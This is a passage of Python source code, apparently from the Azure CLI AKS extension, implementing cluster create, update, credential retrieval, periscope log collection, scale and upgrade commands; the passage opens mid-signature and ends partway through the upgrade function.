admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
enable_managed_identity=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
disable_sgxquotehelper=False,
assign_identity=None,
no_wait=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
            raise CLIError('--enable-vmss and the provided vm_set_type ({}) conflict with each other'.
                           format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
mode="System",
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
identity_client_id = service_principal_profile.client_id
if enable_managed_identity and assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity)
if not _add_role_assignment(
cmd.cli_ctx,
'Network Contributor',
identity_client_id,
scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
disable_sgxquotehelper
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError('"--admin-aad-object-id" can only be used together with "--enable-aad"')
if enable_azure_rbac is True:
raise CLIError('"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if not enable_managed_identity and assign_identity:
raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
enable_rbac = True
if disable_rbac:
enable_rbac = False
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = get_aks_custom_headers(aks_custom_headers)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
logger.info('AKS cluster is creating, please wait...')
            # some addons require post cluster creation role assignment
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
created_cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(created_cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(created_cluster, cmd)
else:
created_cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers).result()
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if created_cluster.identity_profile is None or \
created_cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
                                   'named <CLUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = created_cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
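# Illustrative invocation of the command implemented below (placeholder names):
#   az aks update -g MyResourceGroup -n MyManagedCluster --enable-cluster-autoscaler \
#       --min-count 1 --max-count 5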
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
aks_custom_headers=None):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
    if not update_autoscaler and \
       cluster_autoscaler_profile is None and \
       not update_acr and \
       not update_lb_profile and \
       api_server_authorized_ip_ranges is None and \
       not update_pod_security and \
       not uptime_sla and \
       not enable_aad and \
       not update_aad_profile:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
                       'to update per-node-pool autoscaler settings')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
                           'to enable cluster autoscaler with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
                           '<CLUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance, custom_headers=headers)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior. These fields are not sent
    by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
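# Illustrative invocation (placeholder names): az aks get-credentials -g MyResourceGroup -n MyManagedCluster --admin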
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
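    """Deploy aks-periscope to the cluster to collect logs and diagnostic information and upload them to a storage account."""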
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
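        # Generate a one-day read/write SAS for the periscope uploads and a separate read/list-only SAS for viewing the results.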
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
    print('If you share access to that storage account with Azure support, you consent to the terms outlined'
          f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_fqdn = fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
    print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
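# Illustrative invocation (placeholder names): az aks scale -g MyResourceGroup -n MyManagedCluster --node-count 5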
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the node pool name or use the "az aks nodepool" command to scale a node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
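# Illustrative invocation (placeholder names): az aks upgrade -g MyResourceGroup -n MyManagedCluster --kubernetes-version <version>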
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade the node image version. If you only want to upgrade the node image version, please use the "--node-image-only" option only.')
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. The node image only upgrade operation can only be applied to VirtualMachineScaleSets clusters.')
_upgrade_single_agent_pool_node_image(agent_pool_client, resource_group_name, name, agent_pool_profile, no_wait)
return None
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
